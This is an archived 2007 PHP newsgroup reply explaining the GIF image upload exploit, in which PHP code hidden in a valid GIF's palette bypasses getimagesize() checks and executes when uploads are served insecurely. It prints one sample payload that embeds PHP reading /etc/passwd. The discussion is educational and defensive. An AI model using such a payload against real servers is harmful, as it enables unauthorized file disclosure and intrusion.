Re: GIF PHP Exploit — PHP Programming Language

You are here: Re: GIF PHP Exploit « PHP Programming Language « IT news, forums, messages

Posted by Manuel Lemos on 06/23/07 22:12

Hello,

on 06/23/2007 08:25 AM Jerry Stuckle said the following:
>>>> It's been mentioned here a couple of times in different threads
>>>> regarding
>>>> image uploading. It's not new, but I found a clear explanation of
>>>> what it
>>>> is and how to deal with it. Hope it helps some of you.
>>>>
>>>> http://www.phpclasses.org/blog/post/67-PHP-security-exploit-with-GIF-images.html
>>>>
>>>>
>>>>
>>>> Best!
>>>> Sh.
>>> How this exploit is related specifically to GIF files? You can insert
>>> php code in any file and every upload script that doesn't check file
>>> extensions is vulnerable.
>>
>> It is explained in the article. You can upload a specially crafted GIF
>> image that embeds PHP code. Many developers use PHP getimagesize()
>> function to validate that the image is GIF (or other types). The
>> getimagesize function will not fail because the crafted image is a valid
>> GIF.
>>
>> Depending on you serve uploaded GIF files, the embedded PHP code may be
>> executed .
>>
>> Using GD image manipulation functions may not save anybody from exploits
>> because the PHP code may be embedded in the image palette space. If
>> those GD functions preserve the original palette, the embedded PHP code
>> remains there.
>>
>
> I don't know anyone in their right mind who would set up a server to
> parse gif's as PHP code.

You are missing the point. Developers are not parsing GIFs as PHP code
intentionally.

Some less informed developers are serving uploaded GIFs in a insecure
ways because that triggers the execution of PHP code that may embedded
inside the GIF data, for instance as a stream of bytes in the GIF
palette like this:.

GIF98a other binary data and then GIF palette here<?php
readfile('/etc/passwd'); ?> more binary data.

That is explained in the article.

--

Regards,
Manuel Lemos

Metastorage - Data object relational mapping layer generator
http://www.metastorage.net/

PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/

Navigation:

Next in forum: Re: Birthdays
Prev in forum: Re: 2 methods of including files sequence
Thread view: Re: GIF PHP Exploit

[Reply to this message]

Удаленная работа для программистов • Как заработать на Google AdSense • England, UK • статьи на английском • PHP MySQL CMS Apache Oscommerce • Online Business Knowledge Base • DVD MP3 AVI MP4 players codecs conversion help

Home • Search • Site Map • Set as Homepage • Add to Favourites

Сайт изготовлен в Студии Валентина Петручека —
изготовление и поддержка веб-сайтов, разработка программного обеспечения, поисковая оптимизация